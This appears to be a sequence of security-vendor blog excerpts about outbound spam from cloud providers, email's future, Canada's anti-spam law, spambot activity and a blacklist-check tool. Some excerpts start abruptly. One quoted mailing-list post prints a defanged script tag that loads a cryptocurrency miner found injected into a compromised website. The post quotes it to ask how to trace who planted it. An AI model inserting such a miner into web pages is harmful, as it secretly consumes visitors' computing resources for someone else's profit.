How do Cloud providers deal with outbound spam?

When Amazon Web Services (AWS) used a live webcast to announce their new DynamoDB system, with Urz Wendler looking just shy of Steve Jobs (although a few pounds heavier), I knew that the cloud had finally arrived. One of the new buzz words surrounding the cloud (there are many) is IaaS, which stands for “Infrastructure as a Service”. Amazon Web Services was perhaps the first IaaS provider. Among them, VPS.net and RackSpace were early entrants. But as the market matures, an increasing number of companies now provide an IaaS, including HP, who relatively recently launched the HP Cloud. Why so many providers? Shouldn’t there be consolidation in the IaaS space as it matures?

No, there shouldn’t be consolidation yet, and this is all thanks to the widespread availability of excellent, open source IaaS offerings like Cloud.com and OpenStack, as well as commercial offerings from companies like VMWare and even startups like OnApp, whose own system powers the massive VPS.net IaaS. These IaaS packages make it easy for someone to set up their own IaaS, in much the same way that Zimbra made it easy for anyone to start offering a great hosted email service.

Of course, as more public IaaS clouds sprout up, we’re seeing more inquiries from IaaS providers who are looking for a way to combat spam and other forms of abuse originating within their newly minted IaaS clouds. Because it’s so easy to set up new virtual servers and other resources with a cloud environment, public IaaS cloud operators are besieged by bad guys, who use fraudulent means to open new accounts, set up spamming boxes (and other bad things like click fraud, child porn hosting, etc.) and begin blasting away at the good reputation of the IaaS provider.

As we see these IaaS services mature, I’m confident we will also see increased demand for services and products to combat fraud within the cloud. And, of course, I look forward to helping these companies with that problem.

Here’s the problem with this reasoning. “Email” in the context of Internet electronic mail is simply a collection of protocols for exchanging messages between parties over the Internet. Yammer and other systems serve the same function, except using different, less open (and often completely closed) protocols. Yammer is essentially the same as email, but implemented within a closed network, where greater control can be effected on the participants. But if you need to get a message to someone who isn’t participating in your private network – be it Facebook, Yammer, Twitter, or some other new system – email will always be the fallback.

My position is that email is a great platform on top of which rich collaboration tools can be built. For instance, Xobni implements an enterprise layer on top of email that pulls together all the information that might be relevant to whatever conversation you’re viewing in your mail client (Outlook, Gmail, etc.). With Xobni, you get to keep the universal acceptability and interoperability of email, while benefiting from integration with other data sources.

Systems like Yammer will have their place, but email is not going away any time soon. It will just get better.

Group,
Recently I ran across the below on a site:

<script type="text/javascript" src="hxxp://www.bitcoinplus.com/js/miner.js">
</script>
<script type="text/javascript">// <![CDATA[
  BitcoinPlusMiner(10215318);
// ]]></script>

I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above.  Would be nice to find out what email address may have been
involved in  compromising the site.  Thanks for any help you may be able
to provide.

James

For those who are not in the know about Bitcoin, it suffices to say that Bitcoin provides a way of turning CPU cycles into cash. We’ve known for a while that botnet operators have been deploying Bitcoin mining programs onto compromised PCs. The difference with what’s been discussed today is that the mining happens not through a botnet installation, but rather simply by visiting the web site and running its JavaScript code in your browser (something that is automatic).

For a cybercriminal, the idea of deploying a bit of JavaScript onto a compromised web site and then monetizing millions of spare cycles of CPU time from web site visitors must evoke something close to a religious experience. Is it time for our web browsers to police JavaScript CPU consumption more aggressively?

1. It’s fast – DNS lookups are done in parallel, so a complete set of results usually comes back in under one second;
2. It’s easy – IP addresses and host names are accepted, and CIDRs will be added soon; and,
3. It gives you useful information – such as the ASN and subnet range from which the IP address was allocated.

For those of you who are so inclined, feel free to figure out the wire-line protocol, which is a REST-ful JSON thing. I can’t promise it won’t be rate limited, but I certainly don’t mind if you script it to provide the back-end for your own multi-RBL checking service.

Without further adieu, here’s the link:

http://www.mailchannels.com/blacklist-check.html

In a November 1st post entitled, “Who’s Really Paying Cybercrimals?” influential blocklist provider Spamhaus suggests that it’s perhaps time that governments started using their financial leverage to choke off funding to spammers, in the same way that they have choked off funding to groups like Wikileaks. This is an interesting idea, because recent research has suggested that the vast majority of spam revenue flows through a relatively small set of payment processors (see Show Me the Money: Characterizing Spam-advertised Revenue [PDF]). If governments were to shut down just a small number of payment processors, spammers would find their business suddenly a great deal less profitable.

What happens after these sources of funds are cut off is anyone’s guess; however, I wouldn’t rule out a move toward pseudonymous payment systems like Bitcoin, or the use of other creative techniques to get around the issue of government control. Wikileaks was particular vulnerable to having its funds choked off because it was easy for Visa and Mastercard to identify transactions headed their way. It’s perhaps a little more difficult to recognize spam-related transactions, because the recipient’s merchant account can switch frequently from one entity to another, and because the patterns of transactions look a great deal like legitimate e-commerce.

Earlier this year, the anti-spam community thought it had scored a major win by enacting the toughest anti-spam laws in the world, right here in Canada. Then today, Michael Geist, a law professor and copyright expert at the University of Ottawa, writes that, “it is déjà vu all over again as the government works to finalize the regulations for the anti-spam legislation and the same groups make many of the same arguments.” Apparently, the Canadian anti-spam law is too tough on marketers, or so they would like us to believe. Fortunately, the law has been passed – it attained “royal assent” in December 2010. What’s being held up are the regulations – the finer points that set out the precise meanings of things in the Act itself.

Canada’s new anti-spam law, titled the Fighting Internet and Wireless Spam Act, sets out some tough requirements on marketers, which are designed to prevent them from sending us email we don’t really want. Unlike the American CAN-SPAM act passed several years ago, the Canadian law requires marketers to obtain your consent before sending you email. But it’s the penalties that really differentiate the Canadian act from its American cousin. Marketers can be sued for violations of the Act even if the email they are sending is originating from another country. This empowers Canadians to sue firms in the US and elsewhere, even though the anti-spam laws in those countries may not be as strict.

Here’s the section that makes me the most excited:

48. (1) A person who alleges that they are affected by an act or omission that constitutes a contravention of any of sections 7 to 10 of this Act or of section 5 of the Personal Information Protection and Electronic Documents Act that relates to a collection or use described in subsection 7.1(2) or (3) of that Act — or that constitutes conduct that is reviewable under section 74.011 of the Competition Act — may apply to a court of competent jurisdiction for an order under section 52 against one or more persons who they allege have committed the act or omission or who they allege are liable for the contravention or reviewable conduct by reason of section 53 or 54.

I know of at least one email technology expert in Canada who is looking forward to setting up a partnership with a litigation practice, specifically to go after American marketers who fall afoul of the new Canadian anti-spam law. I suppose he’ll have to wait a little longer now.

MailChannels protects your IP address reputation by analyzing outgoing email traffic and automatically applying policies on users to prevent internal abuse. MailChannels boasts three key advantages are:

Transparent Filtering – analyzes outgoing email traffic, and applies policies without requiring major configuration changes.

High Scalability – MailChannels handles 30 million messages per hour, and greater than 10,000 connections per second.

Blacklist Avoidance - senders are re-mapped to new IP addresses as soon as they start behaving suspiciously. This reduces the impact on your network’s IP reputation.

After a very quiet summer, it seems that the spam bots have awakened. We recently noticed a spike in blacklistings; after checking the usual data sources, it seems the spike is widespread and indicative of one or more spambot networks getting back into action. The graph above is from the CBL (source: cbl.abuseat.org), which is one of the world’s better botnet blacklists.

Is this another “back to school special” as we have seen in previous years, where the spammers go to sleep over the summer, only to turn their machines back on in time for mom and dad to come home from vacation (and start buying pills)?

Still, despite the recent uptick, botnet spam volume is still well below the peak in early 2010, which was as much as 6 times higher than present volumes.

“Outbound spam filtering is all about ensuring reliable email delivery. If your organization counts on email delivery, then you should invest in outbound spam filtering.”

We’ve written a new white paper that discusses the need for a multi-layered approach in dealing with outbound email abuse (i.e. outbound antispam). The layers are thus:

1. Accurate content filtering – using a great spam filter to tag and potentially reject spam messages before they leave the network;
2. Local reputation management and policy enforcement – keeping track of the reputation of “senders” in your network, and preventing “bad” users from getting too abusive; and,
3. IP address management – moving traffic out through different blocks of IP addresses depending on the reputation of the sender.

The idea of rolling out these techniques is to do on the sending side what receivers are doing on the receiving side – except with the benefit of knowing more about your senders, such as their “account id” or “phone number” depending on what kind of network or service you’re operating. We’d love to hear your feedback on this new white paper, so go ahead and download A Multi-Layered Approach to Effective Outbound Spam Protection and let us know what you think.